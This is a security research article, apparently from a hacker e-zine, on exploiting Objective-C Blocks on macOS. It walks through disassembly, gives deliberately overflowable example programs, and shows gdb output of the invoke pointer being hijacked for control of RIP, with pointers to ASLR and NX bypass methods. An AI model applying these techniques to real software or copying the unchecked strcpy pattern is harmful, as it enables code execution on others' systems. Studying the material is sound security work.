    mov dword [ss:rbp-0x50+var_76], ecx
    mov qword [ss:rbp-0x50+var_64], rax

The value 0x7 is stored in a stack variable to be referenced by the
Block. This is the "multiplier" variable.

    mov dword [ss:rbp-0x50+var_12], 0x7

Now we come to the meat of the Block implementation. As you will see,
there's quite a bit of code here, much more than expected. Before we
continue tracing it we need to understand a little more about Block
internals. The free chapter from the book Advanced Mac OS X
Programming: The Big Nerd Ranch Guide [5] has a really nice write-up
on the internals of Blocks which makes this next bit clear.
Basically there are two structures defined for every Block created,
the block_descriptor and the block_literal, as well as the function
containing the actual compiled implementation of the Block. The
block_literal structure is the most important one for us to
understand. The majority of the assembly listing we are tracing is
used to populate this structure appropriately. Its definition is
shown below:

    struct block_literal_NAME {
        void *isa;
        int flags;
        int reserved;
        void (*invoke)(void *literal, ...);
        struct block_descriptor_NAME *descriptor;
        /* referenced captured variables follow */
    };

Basically, this structure turns our Block into a pseudo Objective-C
object. As you can see, the typical 'isa' pointer at offset 0
contains a pointer to the base class struct for the object. In the
listing below, we can see that the block_literal struct is being
created at offset rbp-0x50+var_16. The ISA pointer is populated with
a pointer to the class "NSConcreteStackBlock".

    lea rax, qword [ss:rbp-0x50+var_16]
    mov rcx, qword [ds:imp___got___NSConcreteStackBlock]
    lea rcx, qword [ds:rcx]
    mov qword [ss:rbp-0x50+var_16], rcx

As described in [5], this class indicates that the Block is stored on
the stack. The other possible base classes are: NSConcreteGlobalBlock
for global Blocks, NSConcreteMallocBlock for heap-based Blocks,
NSConcreteAutoBlock for Blocks affected by garbage collection, and
NSConcreteFinalizingBlock for Blocks which have a
"finalizer"/destructor which must be run upon garbage collection.
Cross-referencing these class structs can give us a pretty good
indication of where Blocks are used in a binary, and also of their
location in memory at runtime.

    mov dword [ss:rbp-0x50+var_24], 0x40000000

The next element populated is the flags field. I won't go into this
too much because the write-up at [5] covers it perfectly.
The flags enum stores some meta-information about the Block,
including garbage collection settings and whether or not the Block is
global. Next the reserved field is set to 0.

    mov dword [ss:rbp-0x50+var_28], 0x0

The __main_block_invoke_1 function is the invoke() method for this
Block. It contains the compiled instructions for the Block body
itself. As you will see, it is called later when the Block is
executed.

    lea rcx, qword [ds:___main_block_invoke_1]
    mov qword [ss:rbp-0x50+var_32], rcx

Earlier we discussed the fact that there are two structures for every
Block. The second of these, the block_descriptor, is pre-created at
compile time and stored in the __data section.

    lea rcx, qword [ds:___block_descriptor_tmp_1.1]
    mov qword [ss:rbp-0x50+var_40], rcx

The struct definition is as follows:

    static const struct block_descriptor_NAME {
        unsigned long reserved;
        unsigned long literal_size;
        /* helper functions - present only if needed */
        void (*copy_helper)(void *dst, void *src);
        void (*dispose_helper)(void *src);
    };

Basically, the only field we care about most of the time is
literal_size, which contains the total size of the block_literal. The
other function pointers are only used in specific cases. The rest of
the block_literal struct contains the captured variables referenced
by invoke. A copy of the "multiplier" variable is copied into this
struct.

    mov ecx, dword [ss:rbp-0x50+var_12]
    mov dword [ss:rbp-0x50+var_48], ecx

Now that the literal struct is populated, the code invokes the Block,
passing in the arguments. This is done by retrieving the invoke
function pointer from the literal struct populated earlier. I
probably should have used an optimization flag when I compiled this,
because the next couple of instructions are a little silly. A pointer
to the block_literal struct is moved into var_0, then moved back into
rax...
    mov qword [ss:rbp-0x50+var_0], rax
    mov rax, qword [ss:rbp-0x50+var_0]

Next the invoke function pointer is moved into rax by dereferencing
this pointer and adding 16 (0x10).

    mov rax, qword [ds:rax+0x10]

The pointer to the block_literal struct is then moved into rcx.

    mov rcx, qword [ss:rbp-0x50+var_0]

The value being passed to the Block in the printf() call (3) is
temporarily moved into edx.

    mov edx, 0x3        ; arg to block

The block_literal struct pointer is moved to rdi, the first argument
register in the x86_64 calling convention (rdi, rsi, rdx, rcx, r8,
r9).

    mov rdi, rcx

The function argument (3) is then moved into esi as the second
argument.

    mov esi, edx

Finally the invoke() method is called -- essentially
invoke(literal, 3).

    call rax

The rest of the assembly listing is just a call to printf to display
the result, followed by the epilogue.

    mov  ecx, eax
    xor  dl, dl
    lea  rdi, qword [ds:0x100000f2c] ; "%d\n"
    mov  esi, ecx
    mov  al, dl
    call imp___stubs__printf
    mov  eax, dword [ss:rbp-0x50+var_60]
    add  rsp, 0x50
    pop  rbp
    ret

As you can see, this process is fairly straightforward; now that we
understand it, we can look at how to abuse it.

--[ Exploitation

In order to demonstrate exploitation scenarios where these Blocks can
be utilized, I will start by modifying the example code to contain a
trivial stack overflow.

    int main(int ac, char **av)
    {
        int multiplier = 7;
        int (^myBlock)(int) = ^(int num) {
            return num * multiplier;
        };
        char buf[20];

        if (ac != 2) {
            printf("error: need 2nd arg\n");
            exit(1);
        }
        strcpy(buf, av[1]);

        printf("%s: %d\n", buf, myBlock(3));
        exit(1);
    }

As you can see, prior to the final printf(), a call which copies the
first argument of the program into a small stack buffer, without
bounds checking, has been added. I also added an exit(1) call to
demonstrate that this program couldn't necessarily be exploited
without utilizing the Block. This also applies to cases where stack
cookies (-fstack-protector) are used.
As we saw in the previous example, the block_literal structure will
be stored on the stack, and in this case the myBlock pointer to it is
stored on the stack as well. So what happens when we overflow the buf
array? Let's run it and see.

    -[dcbz@squee:~/code/blocks]$ gcc blockof.c -o of
    -[dcbz@squee:~/code/blocks]$ ./of
    error: need 2nd arg
    -[dcbz@squee:~/code/blocks]$ ./of hello
    hello: 21
    -[dcbz@squee:~/code/blocks]$ gdb ./of
    (gdb) r `perl -e'print "A"x5000'`
    Starting program: /Users/dcbz/code/blocks/of `perl -e'print "A"x5000'`

    Program received signal EXC_BAD_ACCESS, Could not access memory.
    Reason: 13 at address: 0x0000000000000000
    0x0000000100000e4e in main ()

As you can see, running this program with an overly large argument
overflows the stack-based buffer and we get an EXC_BAD_ACCESS
exception. For some reason gdb claims that it happened at address
0x0. However, if we do some investigation:

    (gdb) x/i $pc
    0x100000e4e:  mov rax,QWORD PTR [rax+0x10]
    (gdb) i r rax
    rax            0x4141414141414141 4702111234474983745

we can see that the program is crashing while dereferencing the
block_literal struct pointer to retrieve the invoke pointer (based on
our previous understanding of the assembly listing). This means we
have overwritten the pointer to the block_literal struct with a
series of 'A's (0x41). Because the pointer to the struct lies in
front of the struct itself, we are unable to modify the invoke
pointer directly. We are therefore left with a construct very similar
to a C++ vptr dereference, and we can exploit it in a very similar
fashion. The construct is essentially "call [ptr+0x10]": we need to
control memory at a known address in which to place a pointer to our
shellcode, and then use the address of that pointer minus 16 (0x10)
when we overwrite the block_literal struct pointer. This results in
execution flow being redirected to our shellcode.
Another solution would be to replace the value of the invoke pointer
with another Block's invoke method, or with a known function, and
then utilize an argument mismatch in a favorable way. Both of these
things have been documented numerous times, so I'm not going to go
into any more detail here. Although I will say, in order to control
memory at a fixed location, a few options are: use the
shared_region_map_file technique, disable ASLR/NX with posix_spawn
for local issues, or use ROP/heap spraying for remote issues.

Now that we've looked at the stack overflow case, let's look at what
happens when the block_literal struct contents are on the heap. To
test this we can take the stack overflow example from earlier and
this time move the destination of the strcpy() call to the heap.

In order to move the Block to the heap we have to utilize a function
in the runtime. libSystem is linked against the Block runtime
library, /usr/lib/system/libsystem_blocks.dylib, which contains
functions for manipulating and inspecting Block information. One of
the exported functions, Block_copy(), is used to create a copy of a
Block on the heap and return a pointer to it. This is typically used
by functions that need to return a Block, since returning a pointer
to a Block on the function's stack would fail when the stack unwinds.
The heap Block is then free()'d via the Block_release() function. To
call these functions we need to include the header file "Block.h".
The Block_copy function checks what type of Block is being passed to
it: if the Block was allocated on the heap or in .bss it simply
returns the Block rather than making a copy.
Otherwise, a copy is placed on the heap and a pointer to it returned,
as you can see in the example code below (the angle-bracketed header
names were mangled in transit; these four are the ones the code
needs):

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <Block.h>

    int main(int ac, char **av)
    {
        char *buf = malloc(20);
        int multiplier = 7;
        int (^stackBlock)(int) = ^(int num) {
            return num * multiplier;
        };
        int (^myBlock)(int) = Block_copy(stackBlock);

        if (ac != 2) {
            printf("error: need 2nd arg\n");
            exit(1);
        }
        strcpy(buf, av[1]);

        printf("%s: %d\n", buf, myBlock(3));
        exit(1);
    }

Now that we have some sample code, let's compile and run it and see
where overflowing it gets us.

    -[dcbz@squee:~/code/blocks]$ gcc bh.c -o bh
    -[dcbz@squee:~/code/blocks]$ gdb ./bh
    (gdb) r hi
    Starting program: /Users/dcbz/code/blocks/bh hi
    Reading symbols for shared libraries +............................. done
    hi: 21

As expected, running it with the string "hi" prints the usual output,
this time executing via the heap-allocated Block. However, if we pass
a string of 500 'A's...

    Program exited with code 01.
    (gdb) r `perl -e'print "A"x500'`
    Starting program: /Users/dcbz/code/blocks/bh `perl -e'print "A"x500'`

    Program received signal EXC_BAD_ACCESS, Could not access memory.
    Reason: 13 at address: 0x0000000000000000
    0x0000000100000dc4 in main ()
    (gdb) x/i $pc
    0x100000dc4:  call rax
    (gdb) i r rax
    rax            0x4141414141414141 4702111234474983745

As you can see, we get a crash again; however, this time rather than
crashing on the dereference of the block_literal pointer, we have
overwritten the invoke() method pointer itself and directly control
RIP. As you can imagine, both of these cases are useful when trying
to gain control of an overflow, especially in the presence of stack
or heap canaries, or an unreachable return.

--[ Future Research - Non-Pointer ISA

Unfortunately, due to the fact that I'm trying to coordinate this
paper's release with my Infiltrate 2015 talk, I will probably not
have time to fully research this area prior to publication.
Basically, in the Objective-C runtime on arm64 the ISA pointer can
function as a tagged pointer as well. Due to the nature of the
address space there is a significant number of unused bits in the
pointer, and these contain an interesting amount of metadata. The
write-up at [6] clearly explains all of this. I will leave the bit
pattern below in case you are interested. I am particularly eager to
investigate the has_cxx_dtor attribute, as well as the sidetable
reference counting information.

    (LSB)
    1 bit   indexed            0 is raw isa, 1 is non-pointer isa.
    1 bit   has_assoc          Object has or once had an associated
                               reference. Objects with no associated
                               references can deallocate faster.
    1 bit   has_cxx_dtor       Object has a C++ or ARC destructor.
                               Objects with no destructor can
                               deallocate faster.
    30 bits shiftcls           Class pointer's non-zero bits.
    9 bits  magic              Equals 0xd2. Used by the debugger to
                               distinguish real objects from
                               uninitialized junk.
    1 bit   weakly_referenced  Object is or once was pointed to by an
                               ARC weak variable. Objects not weakly
                               referenced can deallocate faster.
    1 bit   deallocating       Object is currently deallocating.
    1 bit   has_sidetable_rc   Object's retain count is too large to
                               store inline.
    19 bits extra_rc           Object's retain count above 1. (For
                               example, if extra_rc is 5 then the
                               object's real retain count is 6.)
    (MSB)

--[ Conclusion

Well, you made it to the end, reader. Hopefully this was useful in
some way! Writing is very painful... Thanks for reading!
- nemo --[ References [1] The Objective-C Runtime: Understanding and Abusing - http://phrack.org/issues/66/4.html [2] Abusing Performance Optimization Weaknesses to Bypass ASLR - http://www.cc.gatech.edu/~blee303/paper/BH_ASLR_slides.pdf [3] - Lets build tagged pointers: https://www.mikeash.com/pyblog/ \ friday-qa-2012-07-27-lets-build-tagged-pointers.html [4] Apple Block Conceptual - http://developer.apple.com/library/ios/#documentation/cocoa/ \ Conceptual/Blocks/Articles/bxOverview.html#//apple_ref/doc/uid/ \ TP40007502-CH3-SW1 [5] Big Nerd Ranch Advanced Mac OS X Programming: Block - http://www.informit.com/articles/article.aspx?p=1749598&seqNum=12 [6] Non-pointer ISA http://www.sealiesoftware.com/blog/archive/2013/09/24/ \ objc_explain_Non-pointer_isa.html --[ Appendix - Source Code begin 644 code.tgz M'XL(`)7]'U4``^U:6W/3.!3F-?X5(CL%.VU:WYTV9:'1[/%P]+L@G'EABF/7=C!B6H).T&7WW=6_ MV$F%)A)O(F\@^=&P+9SA<"`\](@X[H(%_@>[:&,S_XV"_[IF4?ZK%N=_%L^Y'_,:Q+;>$;-P$_ M&7+^![87[H;]&_FOFJ96BO]4X+]FJ0;G?Q58P?\M0H+?!MCU0HPZYYT_+KJO M_KY`-7FJR1>Z+LO"T1&2I\>RJ[DM$Y^0FL-A2NK-A)Z?=R^Z%V^(R#&9*R@E M"$*2QA,G18[MC#!8GO@S^B+4_"@QQ;`_R1^R-P=ZT!6A.GBJ.N(>= MJ710U./:UYC6A9BI7A+QSC:N).U@BCP>'S.#7:GCJI:)"'K\) M19N7W6X*TC`]/HRJURO>:3U]:-M+__+2T8?W+ULLYZ0^PI"'/D6Q/ZCW2;^* M]O?[J(O3E,A/QBCK:M9^]M:3^]`0Z*#KNHXLMQ$H86`GUT+-C6+1HWD*:B,/ MG9:4%M[WGRELM'E%'JE()&LK/7%PSVLJ9-9JV>,A*"/DYRK\%8G>Z:DJE4N` M8M+F!M@>7&'LMA%D'C7@H]CLHM9QIX7F$$0W"-O3`]#B64D5(>,"+6`[Y4RAW(!:*1>?.+ZMG)@A*>%#?\[U;"S-6`1_S90#*V&GD$^E2L0`'"4[% M)ZYS\/3CU'&>'F1$<1W*,-=SIZ?)?5) MZ[!.DSA$,HFP[C>Z*OM_4W^0^%^33:OP_[IJDOA?D17N_ZO`]_G_RP]OGW_H MO+YXWT7$K\K4^\M3"ZSP\;';:NFZ=4L`P`JVJ'72K2+[[7GW-8+,%IO*=2Z] MY-&5S*-3<\&(31UZGD0\`7/O6T49<1Y:W"$86.'1ER.#V73MEP.#G?GV^83$ M]P9XP>'_/)Z>>7(Z!N)>VVPXX,Y+.I@E[N_/NW2:N.BZ]U%668.$!J!G=(P+ M(C'UY2OJ:2++,`U=U\UVY;[SKB[S+CZ3,`5J(11LUXH8JMSYYYE6K^]^KEH+ MKK4[\MP4REQM6P%,\D*&N/!.NGEZJDMT,==Q"1:X1+RF(N5C+0P%F;9J>_"C M1AUBV6!(5<4@'`^'//Y["_[%!7._BS8VG?^JRNS\E]W_Z:K!X[]*`,;B1*@- 
M'0V`PRN^1K-0CZ47PX@=DJ(FA%-RN0VBY"-12YDZH+@P$,(S<8! M32K2'WHR?D'D_$_MX1`/=O,S`'G[^W]5`T,!_)=U@]__5X&%]=^)&]AD_W6K ML/^*9FBP_H:AJ-S^5X&2_5]IQ\,$=A(!,]_L^?;2"0TLE5P@>]U&1IV746^7 M@:W-%8Z+=K+7;634>1FU[(W8"&?]GO5FUD9)\J$7[QZPP/]\N>^UC4W\UY3\ M_@_VU/3\SS#X_5\UV'S85Y3H1#%^8:?V4?Y`CP+O<$96WJ5>=L\)T]BF$@]. MT-YD;@,J]41O("DKSX_\R*_WZ9$0WY-^+Y;X7QC6^VMCH__7BO-_Q;)(_&'?7*-RJK, MSL38B_0DG)V3R5/7(F;ALOLF&HIG]74'C+T0Y0EOX)W\_VG[$_P+GG.MX;_Z M8/PW9<9_C?._"ORH_`>M4,I_6_)?ECG_[X0E_A<;N/MK8Q/_35TIXG_=5"C_ M#9/SOPI4R__\KCC9^JXX'7F)E]@W./Y,J,NT,XQ2IJ_D^GBU54CFH@*#7IP5 M[;VGPFCU[6Q1:OT%95*Z?)V[XERZ55MM?I+RO5INK/;.Z@=)Y;N:-?ROU/^; MQ?FO82FFQ?E?(7YT_I\S;$GT[)>?D[`)^LSIS<'!P<'!P<'!P<'!P<'!P<'! /P<'!\